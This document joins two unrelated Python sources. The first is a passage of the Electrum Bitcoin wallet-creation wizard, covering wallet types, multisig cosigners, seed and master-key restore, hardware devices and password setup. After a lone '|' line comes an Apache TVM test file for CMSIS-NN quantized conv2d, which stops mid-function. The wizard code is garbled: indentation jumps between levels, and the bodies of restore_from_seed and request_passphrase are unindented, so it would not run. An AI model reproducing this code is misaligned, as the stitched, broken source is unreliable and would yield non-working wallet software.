    """Return True when there is a previous step on the wizard stack."""
    return len(self.stack)>1
def go_back(self):
    """Replay the previous wizard step; no-op when at the first step."""
    if not self.can_go_back():
        return
    # Pop the current step, then pop and re-run the previous one
    # (run() pushes it back onto the stack).
    self.stack.pop()
    action, args = self.stack.pop()
    self.run(action, *args)
def new(self):
    """First wizard screen: ask which kind of wallet to create."""
    name = os.path.basename(self.storage.path)
    title = _("Create") + ' ' + name
    message = '\n'.join([
        _("What kind of wallet do you want to create?")
    ])
    wallet_kinds = [
        ('standard', _("Standard wallet")),
        ('2fa', _("Wallet with two-factor authentication")),
        ('multisig', _("Multi-signature wallet")),
        ('imported', _("Import Bitcoin addresses or private keys")),
    ]
    # Offer only the kinds this build supports (per wallet_types).
    choices = [pair for pair in wallet_kinds if pair[0] in wallet_types]
    self.choice_dialog(title=title, message=message, choices=choices, run_next=self.on_wallet_type)
def upgrade_storage(self):
    """Upgrade the wallet file format behind a waiting dialog.

    An exception raised by the upgrade is captured in the worker and
    re-raised in on_finished() once the dialog completes; on success
    the wallet is (re)loaded and the wizard terminates.
    """
    exc = None
    def on_finished():
        if exc is None:
            self.wallet = Wallet(self.storage)
            self.terminate()
        else:
            raise exc
    def do_upgrade():
        nonlocal exc
        try:
            self.storage.upgrade()
        except Exception as e:
            exc = e
    self.waiting_dialog(do_upgrade, _('Upgrading wallet format...'), on_finished=on_finished)
def load_2fa(self):
    """Mark the storage as a 2FA wallet and load the trustedcoin plugin."""
    self.storage.put('wallet_type', '2fa')
    self.storage.put('use_trustedcoin', True)
    self.plugin = self.plugins.load_plugin('trustedcoin')
def on_wallet_type(self, choice):
    """Record the chosen wallet kind and dispatch the next wizard action."""
    self.wallet_type = choice
    if choice == 'standard':
        action = 'choose_keystore'
    elif choice == 'multisig':
        action = 'choose_multisig'
    elif choice == '2fa':
        # 2FA delegates the next action to the trustedcoin plugin state.
        self.load_2fa()
        action = self.storage.get_action()
    elif choice == 'imported':
        action = 'import_addresses_or_keys'
    # NOTE(review): an unexpected *choice* would leave `action` unbound and
    # raise NameError; the dialog restricts choices, but worth verifying.
    self.run(action)
def choose_multisig(self):
    """Ask for the m-of-n multisig parameters, then choose a keystore."""
    def on_multisig(m, n):
        # Persist e.g. "2of3" as the wallet type; n cosigner keystores
        # will be collected by subsequent choose_keystore runs.
        self.multisig_type = "%dof%d"%(m, n)
        self.storage.put('wallet_type', self.multisig_type)
        self.n = n
        self.run('choose_keystore')
    self.multisig_dialog(run_next=on_multisig)
def choose_keystore(self):
    """Offer keystore sources for the next keystore/cosigner.

    For a standard wallet (or the first multisig cosigner) the user can
    create or restore a seed, enter a master key, or use a hardware
    device; later cosigners get the cosigner-specific variants.
    """
    assert self.wallet_type in ['standard', 'multisig']
    i = len(self.keystores)
    title = _('Add cosigner') + ' (%d of %d)'%(i+1, self.n) if self.wallet_type=='multisig' else _('Keystore')
    if self.wallet_type =='standard' or i==0:
        message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
        choices = [
            ('choose_seed_type', _('Create a new seed')),
            ('restore_from_seed', _('I already have a seed')),
            ('restore_from_key', _('Use a master key')),
        ]
        if not self.is_kivy:
            # Hardware wallets are not supported on the kivy GUI.
            choices.append(('choose_hw_device', _('Use a hardware device')))
    else:
        message = _('Add a cosigner to your multi-sig wallet')
        choices = [
            ('restore_from_key', _('Enter cosigner key')),
            ('restore_from_seed', _('Enter cosigner seed')),
        ]
        if not self.is_kivy:
            choices.append(('choose_hw_device', _('Cosign with hardware device')))
    self.choice_dialog(title=title, message=message, choices=choices, run_next=self.run)
def import_addresses_or_keys(self):
    """Prompt for a list of addresses (watch-only) or private keys."""
    # Input is valid if it parses as an address list or a privkey list.
    v = lambda x: keystore.is_address_list(x) or keystore.is_private_key_list(x)
    title = _("Import Bitcoin Addresses")
    message = _("Enter a list of Bitcoin addresses (this will create a watching-only wallet), or a list of private keys.")
    self.add_xpub_dialog(title=title, message=message, run_next=self.on_import,
                         is_valid=v, allow_multi=True, show_wif_help=True)
def on_import(self, text):
    """Import the entered addresses or private keys into the wallet.

    :param text: whitespace-separated addresses, or a private key list
    """
    # create a temporary wallet and exploit that modifications
    # will be reflected on self.storage
    if keystore.is_address_list(text):
        w = Imported_Wallet(self.storage)
        for x in text.split():
            w.import_address(x)
    elif keystore.is_private_key_list(text):
        k = keystore.Imported_KeyStore({})
        self.storage.put('keystore', k.dump())
        w = Imported_Wallet(self.storage)
        for x in keystore.get_private_keys(text):
            w.import_private_key(x, None)
        self.keystores.append(w.keystore)
    else:
        # Neither form recognized: abort the wizard.
        return self.terminate()
    return self.run('create_wallet')
def restore_from_key(self):
    """Prompt for a master key (xpub for watch-only, xprv for spending).

    Multisig cosigners get the cosigner dialog with BIP32-key validation
    instead of the generic master-key dialog.
    """
    if self.wallet_type == 'standard':
        v = keystore.is_master_key
        title = _("Create keystore from a master key")
        message = ' '.join([
            _("To create a watching-only wallet, please enter your master public key (xpub/ypub/zpub)."),
            _("To create a spending wallet, please enter a master private key (xprv/yprv/zprv).")
        ])
        self.add_xpub_dialog(title=title, message=message, run_next=self.on_restore_from_key, is_valid=v)
    else:
        i = len(self.keystores) + 1
        self.add_cosigner_dialog(index=i, run_next=self.on_restore_from_key, is_valid=keystore.is_bip32_key)
def on_restore_from_key(self, text):
    """Build a keystore from the entered master key and continue."""
    k = keystore.from_master_key(text)
    self.on_keystore(k)
def choose_hw_device(self, purpose=HWD_SETUP_NEW_WALLET):
    """Scan for hardware wallets and let the user pick one.

    :param purpose: HWD_SETUP_NEW_WALLET or HWD_SETUP_DECRYPT_WALLET,
        forwarded to on_device().
    Shows a retry dialog (which calls this method again) when no plugin
    support or no device is found.
    """
    title = _('Hardware Keystore')
    # check available plugins
    support = self.plugins.get_hardware_support()
    if not support:
        msg = '\n'.join([
            _('No hardware wallet support found on your system.'),
            _('Please install the relevant libraries (eg python-trezor for Trezor).'),
        ])
        self.confirm_dialog(title=title, message=msg, run_next= lambda x: self.choose_hw_device(purpose))
        return
    # scan devices
    devices = []
    devmgr = self.plugins.device_manager
    try:
        scanned_devices = devmgr.scan_devices()
    except BaseException as e:
        devmgr.print_error('error scanning devices: {}'.format(e))
        debug_msg = '  {}:\n    {}'.format(_('Error scanning devices'), e)
    else:
        debug_msg = ''
        # Collect per-plugin device info; errors are accumulated in the
        # debug message shown to the user rather than aborting the scan.
        for name, description, plugin in support:
            try:
                # FIXME: side-effect: unpaired_device_info sets client.handler
                u = devmgr.unpaired_device_infos(None, plugin, devices=scanned_devices)
            except BaseException as e:
                devmgr.print_error('error getting device infos for {}: {}'.format(name, e))
                indented_error_msg = '    '.join([''] + str(e).splitlines(keepends=True))
                debug_msg += '  {}:\n{}\n'.format(plugin.name, indented_error_msg)
                continue
            devices += list(map(lambda x: (name, x), u))
    if not debug_msg:
        debug_msg = '  {}'.format(_('No exceptions encountered.'))
    if not devices:
        msg = ''.join([
            _('No hardware device detected.') + '\n',
            _('To trigger a rescan, press \'Next\'.') + '\n\n',
            _('If your device is not detected on Windows, go to "Settings", "Devices", "Connected devices", and do "Remove device". Then, plug your device again.') + ' ',
            _('On Linux, you might have to add a new permission to your udev rules.') + '\n\n',
            _('Debug message') + '\n',
            debug_msg
        ])
        self.confirm_dialog(title=title, message=msg, run_next= lambda x: self.choose_hw_device(purpose))
        return
    # select device
    self.devices = devices
    choices = []
    for name, info in devices:
        state = _("initialized") if info.initialized else _("wiped")
        label = info.label or _("An unnamed {}").format(name)
        descr = "%s [%s, %s]" % (label, name, state)
        choices.append(((name, info), descr))
    msg = _('Select a device') + ':'
    self.choice_dialog(title=title, message=msg, choices=choices, run_next= lambda *args: self.on_device(*args, purpose=purpose))
    def on_device(self, name, device_info, *, purpose):
        """Called once the user selected a device; set it up via its plugin.

        On failure (I/O error, user cancellation, or anything else) the user
        is sent back to device selection (choose_hw_device).
        """
        self.plugin = self.plugins.get_plugin(name)
        try:
            self.plugin.setup_device(device_info, self, purpose)
        except OSError as e:
            # Likely a transport/connection problem: forget the pairing so
            # the next attempt performs a fresh re-pair with the device.
            self.show_error(_('We encountered an error while connecting to your device:')
                            + '\n' + str(e) + '\n'
                            + _('To try to fix this, we will now re-pair with your device.') + '\n'
                            + _('Please try again.'))
            devmgr = self.plugins.device_manager
            devmgr.unpair_id(device_info.device.id_)
            self.choose_hw_device(purpose)
            return
        except (UserCancelled, GoBack):
            self.choose_hw_device(purpose)
            return
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            self.show_error(str(e))
            self.choose_hw_device(purpose)
            return
        if purpose == HWD_SETUP_NEW_WALLET:
            def f(derivation, script_type):
                self.run('on_hw_derivation', name, device_info, derivation, script_type)
            self.derivation_and_script_type_dialog(f)
        elif purpose == HWD_SETUP_DECRYPT_WALLET:
            # Derive the storage-encryption password from the device xpub at
            # a fixed derivation path, then try to decrypt the wallet file.
            derivation = get_derivation_used_for_hw_device_encryption()
            xpub = self.plugin.get_xpub(device_info.device.id_, derivation, 'standard', self)
            password = keystore.Xpub.get_pubkey_from_xpub(xpub, ())
            try:
                self.storage.decrypt(password)
            except InvalidPassword:
                # try to clear session so that user can type another passphrase
                devmgr = self.plugins.device_manager
                client = devmgr.client_by_id(device_info.device.id_)
                if hasattr(client, 'clear_session'):  # FIXME not all hw wallet plugins have this
                    client.clear_session()
                raise
        else:
            raise Exception('unknown purpose: %s' % purpose)
    def derivation_and_script_type_dialog(self, f):
        """Ask the user for a script type and an (editable) derivation path.

        *f* is invoked as f(derivation, script_type). The dialog is retried
        in a loop if the chosen script type is not supported by the device.
        """
        message1 = _('Choose the type of addresses in your wallet.')
        message2 = '\n'.join([
            _('You can override the suggested derivation path.'),
            _('If you are not sure what this is, leave this field unchanged.')
        ])
        if self.wallet_type == 'multisig':
            # There is no general standard for HD multisig.
            # For legacy, this is partially compatible with BIP45; assumes index=0
            # For segwit, a custom path is used, as there is no standard at all.
            choices = [
                ('standard', 'legacy multisig (p2sh)', "m/45'/0"),
                ('p2wsh-p2sh', 'p2sh-segwit multisig (p2wsh-p2sh)', purpose48_derivation(0, xtype='p2wsh-p2sh')),
                ('p2wsh', 'native segwit multisig (p2wsh)', purpose48_derivation(0, xtype='p2wsh')),
            ]
        else:
            # (script type, display label, suggested BIP43 derivation path)
            choices = [
                ('standard', 'legacy (p2pkh)', bip44_derivation(0, bip43_purpose=44)),
                ('p2wpkh-p2sh', 'p2sh-segwit (p2wpkh-p2sh)', bip44_derivation(0, bip43_purpose=49)),
                ('p2wpkh', 'native segwit (p2wpkh)', bip44_derivation(0, bip43_purpose=84)),
            ]
        while True:
            try:
                self.choice_and_line_dialog(
                    run_next=f, title=_('Script type and Derivation path'), message1=message1,
                    message2=message2, choices=choices, test_text=bitcoin.is_bip32_derivation)
                return
            except ScriptTypeNotSupported as e:
                self.show_error(e)
                # let the user choose again
    def on_hw_derivation(self, name, device_info, derivation, xtype):
        """Build a hardware keystore from the device xpub at *derivation*/*xtype*."""
        from .keystore import hardware_keystore
        try:
            xpub = self.plugin.get_xpub(device_info.device.id_, derivation, xtype, self)
        except ScriptTypeNotSupported:
            raise  # this is handled in derivation_dialog
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            self.show_error(e)
            return
        # Serialized keystore description consumed by hardware_keystore().
        d = {
            'type': 'hardware',
            'hw_type': name,
            'derivation': derivation,
            'xpub': xpub,
            'label': device_info.label,
        }
        k = hardware_keystore(d)
        self.on_keystore(k)
    def passphrase_dialog(self, run_next, is_restoring=False):
        """Prompt for an optional seed extension ("passphrase").

        run_next receives the entered extension string ('' if left empty).
        """
        title = _('Seed extension')
        message = '\n'.join([
            _('You may extend your seed with custom words.'),
            _('Your seed extension must be saved together with your seed.'),
        ])
        warning = '\n'.join([
            _('Note that this is NOT your encryption password.'),
            _('If you do not know what this is, leave this field empty.'),
        ])
        # Extra warning when restoring a BIP39 seed (issue #4566).
        warn_issue4566 = is_restoring and self.seed_type == 'bip39'
        self.line_dialog(title=title, message=message, warning=warning,
                         default='', test=lambda x: True, run_next=run_next,
                         warn_issue4566=warn_issue4566)
def restore_from_seed(self):
self.opt_bip39 = True
self.opt_ext = True
is_cosigning_seed = lambda x: bitcoin.seed_type(x) in ['standard', 'segwit']
test = bitcoin.is_seed if self.wallet_type == 'standard' else is_cosigning_seed
self.restore_seed_dialog(run_next=self.on_restore_seed, test=test)
    def on_restore_seed(self, seed, is_bip39, is_ext):
        """Dispatch on the detected seed type; optionally ask for an extension."""
        self.seed_type = 'bip39' if is_bip39 else bitcoin.seed_type(seed)
        if self.seed_type == 'bip39':
            f = lambda passphrase: self.on_restore_bip39(seed, passphrase)
            self.passphrase_dialog(run_next=f, is_restoring=True) if is_ext else f('')
        elif self.seed_type in ['standard', 'segwit']:
            f = lambda passphrase: self.run('create_keystore', seed, passphrase)
            self.passphrase_dialog(run_next=f, is_restoring=True) if is_ext else f('')
        elif self.seed_type == 'old':
            # Old-style Electrum seeds never carry an extension.
            self.run('create_keystore', seed, '')
        elif self.seed_type == '2fa':
            self.load_2fa()
            # Re-dispatch through the (2fa) plugin's own handler.
            self.run('on_restore_seed', seed, is_ext)
        else:
            raise Exception('Unknown seed type', self.seed_type)
    def on_restore_bip39(self, seed, passphrase):
        """BIP39 restore: ask for script type/derivation, then build the keystore."""
        def f(derivation, script_type):
            self.run('on_bip43', seed, passphrase, derivation, script_type)
        self.derivation_and_script_type_dialog(f)
    def create_keystore(self, seed, passphrase):
        # Software keystore from an Electrum seed (+ optional extension).
        k = keystore.from_seed(seed, passphrase, self.wallet_type == 'multisig')
        self.on_keystore(k)
    def on_bip43(self, seed, passphrase, derivation, script_type):
        # Software keystore from a BIP39 seed at the chosen derivation path.
        k = keystore.from_bip39_seed(seed, passphrase, derivation, xtype=script_type)
        self.on_keystore(k)
    def on_keystore(self, k):
        """Validate keystore *k* against the wallet type and collect it.

        For multisig, enforces distinct cosigner xpubs that all share the
        same script type; any violation re-prompts via 'choose_keystore'.
        """
        has_xpub = isinstance(k, keystore.Xpub)
        if has_xpub:
            from .bitcoin import xpub_type
            t1 = xpub_type(k.xpub)
        if self.wallet_type == 'standard':
            if has_xpub and t1 not in ['standard', 'p2wpkh', 'p2wpkh-p2sh']:
                self.show_error(_('Wrong key type') + ' %s' % t1)
                self.run('choose_keystore')
                return
            self.keystores.append(k)
            self.run('create_wallet')
        elif self.wallet_type == 'multisig':
            assert has_xpub
            if t1 not in ['standard', 'p2wsh', 'p2wsh-p2sh']:
                self.show_error(_('Wrong key type') + ' %s' % t1)
                self.run('choose_keystore')
                return
            if k.xpub in map(lambda x: x.xpub, self.keystores):
                self.show_error(_('Error: duplicate master public key'))
                self.run('choose_keystore')
                return
            if len(self.keystores) > 0:
                # All cosigners must use the same xpub/script type.
                t2 = xpub_type(self.keystores[0].xpub)
                if t1 != t2:
                    self.show_error(_('Cannot add this cosigner:') + '\n' + "Their key type is '%s', we are '%s'" % (t1, t2))
                    self.run('choose_keystore')
                    return
            self.keystores.append(k)
            if len(self.keystores) == 1:
                # First cosigner: show our xpub, then collect the others.
                xpub = k.get_master_public_key()
                self.stack = []
                self.run('show_xpub_and_add_cosigners', xpub)
            elif len(self.keystores) < self.n:
                self.run('choose_keystore')
            else:
                self.run('create_wallet')
    def create_wallet(self):
        """Decide how the new wallet's storage should be encrypted.

        Hardware single-sig wallets may be encrypted with a password derived
        from the device xpub; otherwise the user chooses a password.
        """
        encrypt_keystore = any(k.may_have_password() for k in self.keystores)
        # note: the following condition ("if") is duplicated logic from
        # wallet.get_available_storage_encryption_version()
        if self.wallet_type == 'standard' and isinstance(self.keystores[0], keystore.Hardware_KeyStore):
            # offer encrypting with a pw derived from the hw device
            k = self.keystores[0]
            try:
                k.handler = self.plugin.create_handler(self)
                password = k.get_password_for_storage_encryption()
            except UserCancelled:
                # User aborted on the device: unpair and go back to selection.
                devmgr = self.plugins.device_manager
                devmgr.unpair_xpub(k.xpub)
                self.choose_hw_device()
                return
            except BaseException as e:
                traceback.print_exc(file=sys.stderr)
                self.show_error(str(e))
                return
            self.request_storage_encryption(
                run_next=lambda encrypt_storage: self.on_password(
                    password,
                    encrypt_storage=encrypt_storage,
                    storage_enc_version=STO_EV_XPUB_PW,
                    encrypt_keystore=False))
        else:
            # prompt the user to set an arbitrary password
            self.request_password(
                run_next=lambda password, encrypt_storage: self.on_password(
                    password,
                    encrypt_storage=encrypt_storage,
                    storage_enc_version=STO_EV_USER_PW,
                    encrypt_keystore=encrypt_keystore),
                force_disable_encrypt_cb=not encrypt_keystore)
    def on_password(self, password, *, encrypt_storage,
                    storage_enc_version=STO_EV_USER_PW, encrypt_keystore):
        """Apply password/encryption settings and instantiate the wallet.

        Finishes the wizard for imported wallets; otherwise continues with
        'create_addresses'.
        """
        self.storage.set_keystore_encryption(bool(password) and encrypt_keystore)
        if encrypt_storage:
            self.storage.set_password(password, enc_version=storage_enc_version)
        for k in self.keystores:
            if k.may_have_password():
                k.update_password(None, password)
        if self.wallet_type == 'standard':
            self.storage.put('seed_type', self.seed_type)
            keys = self.keystores[0].dump()
            self.storage.put('keystore', keys)
            self.wallet = Standard_Wallet(self.storage)
            self.run('create_addresses')
        elif self.wallet_type == 'multisig':
            # Cosigner keystores are stored under x1/, x2/, ...
            for i, k in enumerate(self.keystores):
                self.storage.put('x%d/' % (i+1), k.dump())
            self.storage.write()
            self.wallet = Multisig_Wallet(self.storage)
            self.run('create_addresses')
        elif self.wallet_type == 'imported':
            if len(self.keystores) > 0:
                keys = self.keystores[0].dump()
                self.storage.put('keystore', keys)
            self.wallet = Imported_Wallet(self.storage)
            self.wallet.storage.write()
            self.terminate()
    def show_xpub_and_add_cosigners(self, xpub):
        # Show our master public key, then return to cosigner selection.
        self.show_xpub_dialog(xpub=xpub, run_next=lambda x: self.run('choose_keystore'))
    def choose_seed_type(self):
        """Let the user pick between a standard and a segwit seed."""
        title = _('Choose Seed type')
        message = ' '.join([
            _("The type of addresses used by your wallet will depend on your seed."),
            _("Segwit wallets use bech32 addresses, defined in BIP173."),
            _("Please note that websites and other wallets may not support these addresses yet."),
            _("Thus, you might want to keep using a non-segwit wallet in order to be able to receive bitcoins during the transition period.")
        ])
        # Choice values are wizard action names dispatched via self.run.
        choices = [
            ('create_standard_seed', _('Standard')),
            ('create_segwit_seed', _('Segwit')),
        ]
        self.choice_dialog(title=title, message=message, choices=choices, run_next=self.run)
def create_segwit_seed(self): self.create_seed('segwit')
def create_standard_seed(self): self.create_seed('standard')
    def create_seed(self, seed_type):
        """Generate a fresh seed of *seed_type* and show it to the user."""
        from . import mnemonic
        self.seed_type = seed_type
        seed = mnemonic.Mnemonic('en').make_seed(self.seed_type)
        # A freshly generated seed is never a BIP39 one.
        self.opt_bip39 = False
        f = lambda x: self.request_passphrase(seed, x)
        self.show_seed_dialog(run_next=f, seed_text=seed)
def request_passphrase(self, seed, opt_passphrase):
if opt_passphrase:
f = lambda x: self.confirm_seed(seed, x)
self.passphrase_dialog(run_next=f)
else:
self.run('confirm_seed', seed, '')
    def confirm_seed(self, seed, passphrase):
        # Make the user re-type the seed (exact match) before continuing.
        f = lambda x: self.confirm_passphrase(seed, passphrase)
        self.confirm_seed_dialog(run_next=f, test=lambda x: x == seed)
    def confirm_passphrase(self, seed, passphrase):
        """If a seed extension was set, make the user re-type it; then proceed."""
        f = lambda x: self.run('create_keystore', seed, x)
        if passphrase:
            title = _('Confirm Seed Extension')
            message = '\n'.join([
                _('Your seed extension must be saved together with your seed.'),
                _('Please type it here.'),
            ])
            self.line_dialog(run_next=f, title=title, message=message, default='', test=lambda x: x == passphrase)
        else:
            f('')
    def create_addresses(self):
        """Derive the initial addresses in the background, then finish the wizard."""
        def task():
            self.wallet.synchronize()
            self.wallet.storage.write()
            self.terminate()
        msg = _("Electrum is generating your addresses, please wait...")
        self.waiting_dialog(task, msg)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""CMSIS-NN integration tests: Conv2D"""
import itertools
import numpy as np
import pytest
import tvm
from tvm import relay
from tvm.relay.op.contrib import cmsisnn
from tests.python.relay.aot.aot_test_utils import (
AOTTestModel,
AOT_CORSTONE300_RUNNER,
AOT_DEFAULT_RUNNER,
generate_ref_data,
compile_and_run,
)
from utils import (
skip_if_no_reference_system,
make_module,
get_range_for_dtype_str,
get_same_padding,
get_conv2d_qnn_params,
make_qnn_relu,
assert_partitioned_function,
assert_no_external_function,
)
def make_model(
    shape,
    kernel_shape,
    input_zero_point,
    input_scale,
    kernel_zero_point,
    kernel_scale,
    output_zero_point,
    output_scale,
    padding,
    strides,
    dilation,
    groups,
    dtype,
    kernel_dtype,
    out_channels,
    weight_format,
    enable_bias,
    relu_type,
):
    """Return a model and any parameters it may have.

    Builds qnn.conv2d over an NHWC input with deterministic random weights,
    optional bias_add, a per-channel requantize back to *dtype*, and an
    optional activation via make_qnn_relu.
    """
    h_index = weight_format.index("H")
    w_index = weight_format.index("W")
    kernel_h = kernel_shape[h_index]
    kernel_w = kernel_shape[w_index]
    invar = relay.var("input", shape=shape, dtype=dtype)
    p = (0, 0, 0, 0)
    if padding == "SAME":
        # Materialize SAME padding as an explicit pad with the input zero
        # point, so the padded region is a quantized no-op.
        p = get_same_padding((shape[1], shape[2]), (kernel_h, kernel_w), dilation, strides)
        invar = relay.nn.pad(
            invar,
            pad_width=[(0, 0), (p[0], p[2]), (p[1], p[3]), (0, 0)],
            pad_value=input_zero_point,
            pad_mode="constant",
        )
        shape = (shape[0], shape[1] + p[0] + p[2], shape[2] + p[1] + p[3], shape[3])
    # Deterministic random kernel spanning the kernel_dtype value range.
    rng = np.random.default_rng(12321)
    w = tvm.nd.array(
        rng.integers(
            np.iinfo(kernel_dtype).min,
            high=np.iinfo(kernel_dtype).max,
            size=kernel_shape,
            dtype=kernel_dtype,
        )
    )
    weight_const = relay.const(w, kernel_dtype)
    # NOTE(review): the input was already padded explicitly above for "SAME",
    # yet p is also passed as conv2d's padding — confirm this is intended
    # against qnn.conv2d semantics.
    conv = relay.qnn.op.conv2d(
        invar,
        weight_const,
        input_zero_point=relay.const(input_zero_point, "int32"),
        kernel_zero_point=relay.const(kernel_zero_point, "int32"),
        input_scale=relay.const(input_scale, "float32"),
        kernel_scale=relay.const(kernel_scale, "float32"),
        kernel_size=(kernel_h, kernel_w),
        data_layout="NHWC",
        kernel_layout=weight_format,
        dilation=dilation,
        strides=strides,
        groups=groups,
        channels=out_channels,
        padding=p,
        out_dtype="int32",
    )
    b = tvm.nd.array(rng.integers(0, high=10, size=(out_channels,), dtype="int32"))
    bias_const = relay.const(b, "int32")
    last_op = relay.nn.bias_add(conv, bias_const, axis=3) if enable_bias else conv
    # Requantize input scale is per output channel: input_scale * kernel_scale[c].
    requant_input_sc = [sc * input_scale for sc in kernel_scale]
    last_op = relay.qnn.op.requantize(
        last_op,
        relay.const(requant_input_sc, "float32"),
        relay.const(0, "int32"),
        relay.const(output_scale, "float32"),
        relay.const(output_zero_point, "int32"),
        out_dtype=dtype,
    )
    last_op = make_qnn_relu(last_op, relu_type, output_scale, output_zero_point, dtype)
    params = {"w": w, "b": b}
    return last_op, params
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("relu_type", ["RELU"])
@pytest.mark.parametrize("enable_bias", [True, False])
@pytest.mark.parametrize(
    "input_zero_point, input_scale, kernel_scale, out_channels",
    [(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_conv2d_symmetric_padding_int8(
    padding,
    enable_bias,
    relu_type,
    input_zero_point,
    input_scale,
    kernel_scale,
    out_channels,
):
    """int8 QNN conv2d (symmetric padding): partition for CMSIS-NN and
    compare AOT output on Corstone-300 against the reference."""
    interface_api = "c"
    use_unpacked_api = True
    test_runner = AOT_CORSTONE300_RUNNER
    # Fixed geometry; only quantization params/padding/bias are parametrized.
    ifm_shape = (1, 64, 100, 4)
    kernel_size = (3, 3)
    strides = (1, 1)
    dilation = (1, 1)
    dtype = "int8"
    groups = 1
    weight_format = "HWIO"
    kernel_h = kernel_size[0]
    kernel_w = kernel_size[1]
    kernel_shape = (kernel_h, kernel_w, ifm_shape[3] // groups, out_channels)
    kernel_zero_point = 0
    in_min, in_max = get_range_for_dtype_str(dtype)
    output_scale, output_zero_point = get_conv2d_qnn_params(
        kernel_shape,
        input_scale,
        input_zero_point,
        kernel_scale,
        kernel_zero_point,
        dtype,
        dtype,
        dtype,
    )
    model, params = make_model(
        ifm_shape,
        kernel_shape,
        input_zero_point,
        input_scale,
        kernel_zero_point,
        kernel_scale,
        output_zero_point,
        output_scale,
        padding,
        strides,
        dilation,
        groups,
        dtype,
        dtype,
        out_channels,
        weight_format,
        enable_bias,
        relu_type,
    )
    orig_mod = make_module(model)
    cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
    # validate pattern matching
    assert_partitioned_function(orig_mod, cmsisnn_mod)
    # validate the output
    rng = np.random.default_rng(12345)
    inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
    output_list = generate_ref_data(orig_mod["main"], inputs, params)
    compile_and_run(
        AOTTestModel(
            module=cmsisnn_mod,
            inputs=inputs,
            outputs=output_list,
            params=params,
            output_tolerance=1,
        ),
        test_runner,
        interface_api,
        use_unpacked_api,
    )
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10314")
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("relu_type", ["RELU", "NONE"])
@pytest.mark.parametrize("enable_bias", [True, False])
@pytest.mark.parametrize(
    "input_zero_point, input_scale, kernel_scale, out_channels",
    [(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_conv2d_asymmetric_padding_int8(
    padding,
    enable_bias,
    relu_type,
    input_zero_point,
    input_scale,
    kernel_scale,
    out_channels,
):
    """int8 QNN conv2d whose geometry (5x5 kernel, stride 2) produces
    asymmetric SAME padding; currently skipped (tvm issue #10314)."""
    interface_api = "c"
    use_unpacked_api = True
    test_runner = AOT_CORSTONE300_RUNNER
    ifm_shape = (1, 25, 25, 12)
    kernel_size = (5, 5)
    strides = (2, 2)
    dilation = (1, 1)
    dtype = "int8"
    groups = 1
    weight_format = "HWIO"
    kernel_h = kernel_size[0]
    kernel_w = kernel_size[1]
    kernel_shape = (kernel_h, kernel_w, ifm_shape[3] // groups, out_channels)
    kernel_zero_point = 0
    in_min, in_max = get_range_for_dtype_str(dtype)
    output_scale, output_zero_point = get_conv2d_qnn_params(
        kernel_shape,
        input_scale,
        input_zero_point,
        kernel_scale,
        kernel_zero_point,
        dtype,
        dtype,
        dtype,
    )
    model, params = make_model(
        ifm_shape,
        kernel_shape,
        input_zero_point,
        input_scale,
        kernel_zero_point,
        kernel_scale,
        output_zero_point,
        output_scale,
        padding,
        strides,
        dilation,
        groups,
        dtype,
        dtype,
        out_channels,
        weight_format,
        enable_bias,
        relu_type,
    )
    orig_mod = make_module(model)
    cmsisnn_mod = cmsisnn.partition_for_cmsisnn(orig_mod, params)
    # validate pattern matching
    assert_partitioned_function(orig_mod, cmsisnn_mod)
    # validate the output
    rng = np.random.default_rng(12345)
    inputs = {"input": rng.integers(in_min, high=in_max, size=ifm_shape, dtype=dtype)}
    output_list = generate_ref_data(orig_mod["main"], inputs, params)
    compile_and_run(
        AOTTestModel(
            module=cmsisnn_mod,
            inputs=inputs,
            outputs=output_list,
            params=params,
            output_tolerance=1,
        ),
        test_runner,
        interface_api,
        use_unpacked_api,
    )
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10314")
@tvm.testing.requires_cmsisnn
@pytest.mark.parametrize("ifm_shape", [(1, 28, 28, 12), (1, 64, 100, 4)])
@pytest.mark.parametrize("kernel_size", [(3, 3)])
@pytest.mark.parametrize("padding", ["SAME", "VALID"])
@pytest.mark.parametrize("strides, dilation", [((1, 1), (1, 1))])
@pytest.mark.parametrize("relu_type", ["RELU"])
@pytest.mark.parametrize(
    "depth_multiplier, enable_bias",
    [(1, True), (3, True)],
)
@pytest.mark.parametrize(
    "input_zero_point, input_scale, kernel_scale, out_channels",
    [(10, 0.0128, [0.11, 0.22], 2), (-64, 1, [1, 0.0256, 1.37], 3)],
)
def test_depthwise_int8(
    ifm_shape,
    kernel_size,
    padding,
    strides,
    dilation,
    enable_bias,
    relu_type,
    input_zero_point,
    input_scale,
    kernel_scale,
    out_channels,
    depth_multiplier,
):
    """int8 QNN depthwise conv2d: partition for CMSIS-NN and compare AOT
    output on Corstone-300 against the reference.

    Currently skipped (tvm issue #10314).
    """
    interface_api = "c"
    use_unpacked_api = True
    test_runner = AOT_CORSTONE300_RUNNER
    dtype = "int8"
    kernel_h = kernel_size[0]
    kernel_w = kernel_size[1]
    kernel_zero_point = 0
    in_min, in_max = get_range_for_dtype_str(dtype)
    # Depthwise configuration: one group per input channel, HWOI kernel
    # layout, and the effective out_channels derived from the input depth
    # and the depth multiplier (the parametrized out_channels is superseded).
    groups = ifm_shape[3]
    weight_format = "HWOI"
    kernel_shape = (kernel_h, kernel_w, ifm_shape[3], depth_multiplier)
    out_channels = ifm_shape[3] * depth_multiplier
